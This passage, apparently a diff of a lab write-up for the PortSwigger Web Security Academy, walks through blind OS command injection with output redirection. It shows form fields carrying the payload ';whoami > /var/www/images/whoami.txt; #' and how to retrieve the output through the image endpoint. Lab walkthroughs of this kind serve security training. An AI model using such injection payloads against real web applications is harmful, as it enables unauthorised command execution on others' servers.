tgihf/writeups/port-swigger-web-academy/os-command-injection/03 - Blind OS command injection with output redirection.md

 csrf=wnAcZp4tDvrgSYNqcJsurav2gF3XTHRj&name=;whoami+>+/var/www/images/whoami.txt;+#&email=;whoami+>+/var/www/images/whoami.txt;+#&subject=;whoami+>+/var/www/images/whoami.txt;+#&message=;whoami+>+/var/www/images/whoami.txt;+#
 ```

-Attempt to navigate to the photo.
-Notice that the photos of the products on the homepage are rendered as `img` tags whose `src` attributes are set to `/images?filename=$FILENAME`.
+Attempt to navigate to the output file at `/var/www/images`.
+Notice that the photos of the products on the homepage are rendered as `img` tags whose `src` attributes are set to `/image?filename=$FILENAME`.
 By navigating to `/images?filename=whoami.txt`, it is possible to read the output of the command.

 ```http
 GET /image?filename=whoami.txt HTTP/1.1